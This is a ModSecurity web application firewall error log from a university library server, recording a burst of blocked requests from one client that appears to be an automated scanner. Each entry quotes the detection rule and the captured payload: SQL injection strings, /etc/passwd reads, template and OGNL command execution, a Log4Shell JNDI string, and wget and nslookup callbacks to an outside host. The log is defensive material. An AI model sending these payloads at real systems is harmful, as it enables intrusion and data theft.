[Tue Aug 29 11:31:55.319321 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAQR49MAAAAz"]
[Tue Aug 29 11:31:55.439671 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10u8Co-f0AAAPiBnUAAAAB"]
[Tue Aug 29 11:31:56.359234 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vMCo-f0AAAPDn-0AAAAP"]
[Tue Aug 29 11:31:56.380828 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlgutz49tssoaygu.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAP5mM0AAAAM"]
[Tue Aug 29 11:31:57.362078 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vcCo-f0AAANsAWgAAAAD"]
[Tue Aug 29 11:31:58.312973 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQNwLIAAAAv"]
[Tue Aug 29 11:31:59.320063 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10v8Co-f0AAAPDoA0AAAAP"]
[Tue Aug 29 11:31:59.331296 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlgsp3espeaqdyha.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAQR4@UAAAAz"]
[Tue Aug 29 11:32:04.445475 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQOv6UAAAAw"]
[Tue Aug 29 11:32:06.354580 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQKOdoAAAAs"]
[Tue Aug 29 11:32:06.441480 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAP8G3oAAAAV"]
[Tue Aug 29 11:32:07.302503 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10x8Co-f0AAAQ83PwAAAAI"]
[Tue Aug 29 11:32:08.310176 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAQ7NG4AAAAH"]
[Tue Aug 29 11:32:08.368131 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQKOegAAAAs"]
[Tue Aug 29 11:32:10.355607 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgobeysp34bu114.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAANWgXoAAAAG"]
[Tue Aug 29 11:32:10.445223 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg1xjpx96pny3ce.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAP5mPUAAAAM"]
[Tue Aug 29 11:32:12.390012 2023] [:error] [pid 1071] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQv1mQAAAAA"]
[Tue Aug 29 11:32:13.315132 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQ83Q4AAAAI"]
[Tue Aug 29 11:32:13.336131 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgzimwm7yzxoyda.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgzimwm7yzxoyda.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQNwNwAAAAv"]
[Tue Aug 29 11:32:15.375183 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQ83RYAAAAI"]
[Tue Aug 29 11:32:15.398900 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAANWgY8AAAAG"]
[Tue Aug 29 11:32:16.372591 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "perpustakaan.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQMr1YAAAAu"]
[Tue Aug 29 11:32:16.372628 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQMr1YAAAAu"]
[Tue Aug 29 11:32:16.461733 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQMr1oAAAAu"]
[Tue Aug 29 11:32:17.419541 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAARA7YAAAAAA"]
[Tue Aug 29 11:32:18.347049 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQOv8gAAAAw"]
[Tue Aug 29 11:32:18.392958 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQUID4AAAA2"]
[Tue Aug 29 11:32:21.336980 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAQ83TMAAAAI"]
[Tue Aug 29 11:32:21.372001 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQV4WUAAAA3"]
[Tue Aug 29 11:32:22.498929 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAQnF-IAAAAF"]
[Tue Aug 29 11:32:23.307458 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAN9sV0AAAAJ"]
[Tue Aug 29 11:32:23.315967 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAPDoE4AAAAP"]
[Tue Aug 29 11:32:25.362288 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAPiBr0AAAAB"]
